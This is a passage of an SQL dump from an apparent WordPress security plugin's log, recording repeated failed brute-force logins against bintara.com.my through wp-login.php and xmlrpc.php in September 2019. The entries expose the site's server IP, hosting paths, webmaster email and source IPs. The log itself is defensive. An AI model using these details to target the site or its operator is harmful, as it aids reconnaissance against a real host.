01:50:56',18257304,19555376,'https://bintara.com.my/xmlrpc.php',1,0,'91.191.173.134'),(23774,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"34346\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2Y-Z3S-xk3mIlSDSjPzgAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568512253.1921\";s:12:\"REQUEST_TIME\";s:10:\"1568512253\";}}','notice','2019-09-15 01:50:54','2019-09-15 01:50:53',17736664,19227192,'https://bintara.com.my/wp-login.php',1,0,'91.191.173.134'),(23773,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"38622\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2WH53S-xk3mIlSDSjO8wAAAAM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568511519.6313\";s:12:\"REQUEST_TIME\";s:10:\"1568511519\";}}','notice','2019-09-15 01:38:41','2019-09-15 01:38:40',18256192,19553936,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.133.250'),(23772,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"38210\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2WHQcaemJNJACwk0T7OAAAAQ0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568511517.4545\";s:12:\"REQUEST_TIME\";s:10:\"1568511517\";}}','notice','2019-09-15 01:38:38','2019-09-15 01:38:37',17735536,19225984,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250'),(23771,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"40294\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2T0wcaemJNJACwk0T6NAAAARU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568510931.2148\";s:12:\"REQUEST_TIME\";s:10:\"1568510931\";}}','notice','2019-09-15 01:28:52','2019-09-15 01:28:51',18257392,19554232,'https://bintara.com.my/xmlrpc.php',1,0,'50.31.26.18'),(23769,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"42022\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2ReZ3S-xk3mIlSDSjM-AAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568510329.4646\";s:12:\"REQUEST_TIME\";s:10:\"1568510329\";}}','notice','2019-09-15 01:18:50','2019-09-15 01:18:49',18251512,19550688,'https://bintara.com.my/xmlrpc.php',1,0,'209.15.37.34'),(23770,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"39832\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2T0AcaemJNJACwk0T6MwAAAQg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568510928.3158\";s:12:\"REQUEST_TIME\";s:10:\"1568510928\";}}','notice','2019-09-15 01:28:49','2019-09-15 01:28:48',17735888,19227240,'https://bintara.com.my/wp-login.php',1,0,'50.31.26.18'),(23768,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"41446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2RdgcaemJNJACwk0T5HwAAARc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568510326.5344\";s:12:\"REQUEST_TIME\";s:10:\"1568510326\";}}','notice','2019-09-15 01:18:47','2019-09-15 01:18:46',17738368,19230328,'https://bintara.com.my/wp-login.php',1,0,'209.15.37.34'),(23767,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"47048\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2PeZ3S-xk3mIlSDSjMUwAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568509817.7608\";s:12:\"REQUEST_TIME\";s:10:\"1568509817\";}}','notice','2019-09-15 01:10:19','2019-09-15 01:10:18',18249744,19550032,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.212.173'),(23766,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"46732\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2Pd7XKYz7ocPqFjcWy7gAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568509815.3393\";s:12:\"REQUEST_TIME\";s:10:\"1568509815\";}}','notice','2019-09-15 01:10:17','2019-09-15 